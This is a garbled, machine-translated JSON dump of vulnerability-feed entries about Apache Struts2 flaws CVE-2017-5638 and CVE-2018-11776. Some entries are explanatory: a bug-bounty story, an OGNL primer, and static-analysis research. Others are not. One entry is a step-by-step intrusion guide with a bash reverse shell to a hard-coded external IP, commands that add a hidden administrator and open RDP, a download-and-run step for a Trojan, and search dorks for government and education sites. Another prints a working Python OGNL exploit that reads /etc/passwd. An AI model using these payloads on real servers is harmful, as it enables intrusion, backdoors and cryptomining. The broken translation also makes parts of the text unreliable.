command can also be self-defined,choose the command Windows, linux, penetration of commonly used commands, including viewing system version information, network connection status, port open status and add to the system with administrator privileges to the new user, open the remote connection service and other operations. \n! [](/Article/UploadPic/2018-7/2018710164555928. png? www. myhack58. com) \nThrough the directory view command to confirm C:\\Windows\\Help directory and C:\\ProgramData whether the directory has been implanted Trojan, if not then the mas. exe Trojan infection. The time of implantation to first create the C#code to text mas. cs, \u7136\u540e\u4f7f\u7528.NET\u7a0b\u5e8f\u5c06\u5176\u7f16\u8bd1\u4e3a\u53ef\u6267\u884c\u6587\u4ef6mas.exe the. \nFirst execute the command to create a mas. cs and write The for download code. \n! [](/Article/UploadPic/2018-7/2018710164555437. png? www. myhack58. com) \n\u7136\u540e\u6267\u884c\u547d\u4ee4\u5c06mas.cs\u901a\u8fc7.NET\u7a0b\u5e8f\u7f16\u8bd1\u4e3amas.exe the. \n! [](/Article/UploadPic/2018-7/2018710164555672. png? www. myhack58. com) \nCommand in the use of mas. exe download mining Trojan netxmr4. To 0. \n! [](/Article/UploadPic/2018-7/2018710164555433. png? www. myhack58. com) \nPart of the attack objectives are as follows: \n! [](/Article/UploadPic/2018-7/2018710164555651. jpg? www. myhack58. com) \nImplantation of mas. the exe size is only 4k,is stored in the directory ProgramData. From Yu see Threat Intelligence Center monitoring and recording can be seen, mas.exe\u4ece\u591a\u4e2aC2\u5730\u5740\u4e0b\u8f7d\u4e86netxmr4.exe(mining Trojan), the o3.exe/o6.exe(providing the right to Trojans)and other Trojans. \n! [](/Article/UploadPic/2018-7/2018710164555713. png? www. myhack58. com)\n\n**[1] [[2]](<90758_2.htm>) [[3]](<90758_3.htm>) [[4]](<90758_4.htm>) [next](<90758_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE \nAffected version: Struts 2.3.5-Struts 2.3.31 \nThe Struts 2.5-Struts 2.5.10 \nRepair solutions: \nUpgrade to Struts2. 3. 32 or the Struts 2.5.10.1 \nStruts2. 3. 32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nThe vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. \n1.2 hazard assessment\nAfter the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. \n1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work\n1\uff0e Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. \n2\uff0e Ready to have a separate IP of the server, \u5728\u4e0a\u9762\u6709nc.exe the. \n3\uff0e Prepare python environment. \nGeneral use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the \u7136\u540e \u5230 \u8be5 \u76ee\u5f55 \u6267\u884c pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: \nC:\\Python27\\python.exeC:\\Python27\\poster-0.8.1\\setup.py install \n! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com) \nFigure 1 The Missing poster. the encode module \n4\uff0e Get a variety of action page \n\uff081\uff09by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. \n\uff082\uff09Baidu aunt law\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: don't vandalize, and now the network security method very good it!!! \n1.3.2 modify the poc exploit code\n1. For the linux version of the modified whoami values: bash-i&gt;&amp; /dev/tcp/122.115.47.39/4433 0&gt;&amp;1 \nDescription of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the \u7136\u540e \u5c06 \u6587\u4ef6 \u4fdd\u5b58 \u4e3a poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. \n! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com) \nFigure 2 modify the linux poc exploit code\n2. Corresponding Windows Server, modify the whomai value: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \n\u5206\u522b \u5c06 poc \u6587\u4ef6 \u4fdd\u5b58 \u4e3a pocwin1.py and pocwin2.py as shown in Figure 3. \n! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com) \nFigure 3 modify the windows under the use of the code\n1.3.3 under Windows fast implement penetration\n1. Each other to open up 3389 \n\uff081\uff09scanning each other whether to open the 3389, open a, respectively, to execute: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the other loopholes, then it will directly add a user\u201cantian365$\u201d, password\u201cWsantian365!*\u201d, the Server to open the 3389, sign up and then download wce64, directly wce64 \u2013w to get the current login password, be sure to use administrator rights to execute. \n\uff082\uff09directly on 3389 \nIn the parameters were modified three times, execute the following code three times, you can open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \n3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. \n2. The Trojan executes the law\n\uff081\uff09Download the Trojan\nFirst you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\\windows\\temp directory. \n\uff082\uff09the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. \nc:\\windows\\temp\\ma.exe \n1.3. 4Linux under the rapid penetration of the ideas\n1. On a standalone server to perform monitoring, required in the independent IP on the server, execute\u201cnc \u2013vv\u2013l \u2013p 4433\u201d, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. \n2. Perform poc \n\n\n**[1] [[2]](<84086_2.htm>) [[3]](<84086_3.htm>) [next](<84086_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-07T09:25:04", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers \nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:31", "description": "! [](/Article/UploadPic/2018-8/2018823153022212.jpg) \n2018 4 months, I to Apache Struts and the Struts security team reported a new remote code execution vulnerability--CVE-2018-11776\uff08S2-057 in to do some configuration on a server running Struts, and can be accessed via the carefully constructed URL to trigger the vulnerability. This discovery is I the Apache Struts ongoing Safety study of part. In this article, I will describe my discovery of a vulnerability and how to exploit the previous vulnerability information to get the Struts internal working of the principle, create a package Struts-specific concept of the QL query. Run these queries will highlight the problematic code results. These works are hosted on GitHub, later we will also to this repository add more query statement and database to help the Struts and other projects of the security research. \n\nMapping the attack surface \nMany security vulnerabilities are addressed from untrusted sources such as user input stream to a particular location of the sink of the data, and the data using an unsafe way-for example, the SQL query, deserialize, and some other interpreted languages, etc., QL can easily search for such vulnerabilities. You just need to describe the various source and sink, and then let the DataFlow library to accomplish these things. For a particular project, began to investigate such issues, a good method is to view the older version of the software known vulnerabilities. This can be in-depth understanding you want to find the source and sink points. \nThis vulnerability discovery process, I first see a RCE vulnerability S2-032\uff08CVE-2016-3081\uff09, S2-033\uff08CVE-2016-3687 and S2-037\uff08CVE-2016-4438-in. With Struts in many other RCE as RCE relates to the untrusted input is converted to OGNL expressions, allowing an attacker on the server to run arbitrary code. These three vulnerabilities are particularly interesting, not only do they let us on the Struts of the internal working mechanism have some understanding, and these three vulnerabilities actually is the same, also repair three back! \nThese three issues are the remote input through the variable methodName as a method of parameter passing caused OgnlUtil::getValue(). \n! [](/Article/UploadPic/2018-8/2018823153022696. png) \nHere the proxy has ActionProxy type, it is an interface. Note that the definition of it, in addition to the method getMethod\uff08\uff09\uff08in the above code is used to assign a value to the variable methodName addition, there are a variety of methods, such as getActionName\uff08\uff09and getNamespace\uff08\uff09\u3002 These methods look like from the URL to return information, so I'll just assume that all of these methods may return untrusted input. The rear of the article I will in depth research I for these the input from where the investigation.\uff09 \nNow use QL to start on these untrusted source modeling: \n! [](/Article/UploadPic/2018-8/2018823153023567. png) \n\nIdentify the OGNL sink point \nNow that we have identified and described some of the non-trusted source, the next step is to sink the point of doing the same thing. As previously mentioned, many of Struts RCE relates to the remote input parsed for OGNL expressions. Struts has many function will eventually be their arguments as OGNL expressions; for we in this article the start of the three vulnerabilities, the use of a OgnlUtil :: getValue \uff08\uff09, but in the vulnerability S2-045\uff08CVE-2017-5638, using TextParseUtil :: translateVariables\uff08\uff09\u3002 We may be looking for execution of OGNL expressions commonly used function, I feel OgnlUtil :: compileAndExecute\uff09and OgnlUtl :: compileAndExecuteMethod\uff08\uff09looks more games. \nMy description: \n! [](/Article/UploadPic/2018-8/2018823153023415. png) \n\nThe first attempt \nNow we have in QL are defined in the source and sink, we can stain the tracking query using these definitions. By defining DataFlow configured to use the DataFlow library: \n! [](/Article/UploadPic/2018-8/2018823153023702. png) \nHere is what I used before defined isActionProxySource and isOgnlSink it. \nNote that I'm here to reload the isAdditionalFlowStep, so that it can allow me to contain the pollution data is propagated to the additional step. Such as allow me to the project-specific information into the flow configuration. For example, if I have by a network of communicating components, I may be in QL as described in those various network-side code is what allows the DataFlow library to track tainted data. \nFor this particular query, I added two additional process steps for the DataFlow library. First: \n! [](/Article/UploadPic/2018-8/2018823153026173. png) \nIt includes tracking the standard Java library calls, string manipulation, etc. of the standard QL TaintTracking library steps. The second Add is an approximate value, allow me to by a field access track tainted data: \n! [](/Article/UploadPic/2018-8/2018823153026186. png) \nThat is if the field is assigned a tainted value, then as long as the two expressions are the same type of method call, the field visit will also be regarded as pollution. See the following example: \n! [](/Article/UploadPic/2018-8/2018823153026144. png) \nSeen from above, the bar in this. field access may not always be contaminated. For example, if in the bar before not to call foo\uff08\uff09\u3002 Therefore, we are not in the default DataFlow :: Configuration contained in this step, because you cannot guarantee that the data always in this manner the flow, however, for digging vulnerabilities, I think adding this very useful. In later posts I will share some of the similar to the other process steps, these steps for find the bug helpful, but for similar reasons, the default case is not included these steps. \n\nThe initial results and Refine the query \nI'm on the latest version of the source code on the run a bit with QL, found that due to the S2-032, S2-033 S2-037 is still marked. These vulnerabilities obviously already been fixed, why still will be reported problem? \n\n\n**[1] [[2]](<91264_2.htm>) [[3]](<91264_3.htm>) [next](<91264_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "S2-057 vulnerability in the original author's README: how to use automated tools find 5 RCE-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", 